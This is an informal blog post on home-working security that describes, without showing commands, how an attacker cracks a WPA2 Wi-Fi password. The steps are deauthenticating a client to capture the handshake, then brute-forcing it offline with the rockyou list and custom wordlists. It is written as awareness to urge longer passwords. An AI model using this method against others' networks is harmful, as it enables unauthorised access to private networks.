Work From Home and Security

The Pandemic really taught us how effectively and efficiently we can do work from home. The question comes here is are we safe ?

I would like to discuss some of the basic security measures we need to follow to protect you from script kiddies. The intention here is ,not to discuss the hacking methods but just to show how easy it is if you ignore some basic rules. I am not a hacker, I always admire who protect us from hackers. “WFH and security” is a series and will breakdown and discuss some of the known vulnerability.

From day one I have been told to keep strong password for anything we work with, but why? this is applicable for any application but here we will discuss about the WIFI (802.11). Let’s see how easy it is to get into your network. Before starting, I assume we all are in WPA2 and WPS is turned off or in PBC mode. I am not discussing those because modern home router defaults to WPA2 and puts WPS in PBC mode. If someone has WEP or WPS not in PBC then i am really sorry to say your network can be compromised in minutes.

The best choice of any evil person to get into your network if you are in WPA2 is either via brute force or via Rogue access point. RAP requires some user action and will discuss later. Now lets focus how to do brute forcing

Now you will be thinking why i am talking about brute forcing since everyone knows how it is working. There are two type of brute forcing we can do either online/offline and in the case of WIFI we uses offline brute forcing. How AP can be brute forced offline is the interesting part here. I am not discussing how things are working under the hood, this is just to give you an overview how easy it is.

Here i am using 2.4 ghz where our most of the home routers SSID is configured. First I will list down the available networks. Meaning i am sniffing all the network around me which communicates in 2.4 ghz band. This is what our computer and mobile phones does for listing the device. But if SSID is hidden we do add SSID manually in computer or in mobile device but here we can even make it listed by deauth attack.

Please notice we have two SSID, fallback and MyInet. Lets target MyInet and list down all the devices connected to MyInet. Please notice we don’t have password for MyInet. You can think it is our neighbours Router.

In the above screenshot you may spot one device under STATION header connected to MyInet. Now we need to capture the handshake between AP and device. But since the device is already connected to AP there will not be any handshake hence we will de-authenticate the device from AP. Here is the trick. we are capturing all the traffic from AP to device and device to AP. Now if any deauth happens we capture the handshake. Deauth means we are pretending as AP and give signal to clients says you have to disconnect and vice versa. It happens via spoofing the MAC address of client and AP

You may notice that we already captured handshake. Now brute force starts. You can relate this like a hash comparison. We have handshake like a hash and we will brute force password against the data captured. This will also generate hash and will compare hash with captured hash. If it matches that is your password.

Before having a guess we will run it with famous rockyou site passwords. It is a dump of many passwords.

Since my password is a common password I found it in a second.

Now Think it doest match with any of the generic password then attacker will create a wordlist. If your password is 5 char long password. Lets see how big the wordlist will be

In the above generated combination you may see it is 67MB in size and it will take less than 1 hour to break. Because rockyou site password is 134Mb and it took around 1.5 hours to finish

Now let’s see your password is 8 char long. Is it good enough ?

1750 GB is very big but don’t be overconfident. You can take the help of GPU or even you can upload the handshake in some site and it will run the job for you. Not advised because it leeks lot of information including your mac address.

Most of the attacker creates wordlist based on the guesses. The information out there about you. Lets see i want to make a combination of pool + r + live

Your file size will be very small even though it is 9 char password. Lets see your password is in the list

Your password is in the list :)

The scary part is that this all happens without your knowledge. You might not be having any clue to know someone is trying to compromise your AP password.

You see how difficult it is to brute force if we are adding 2 more char to the password. You cannot run brute force in local machine if your password is 12 char long. You also know how easy it is if you give common password. Using tool like hydra we can do the same if it is an online attack.

Thank you for reading :)

Frontend Engineer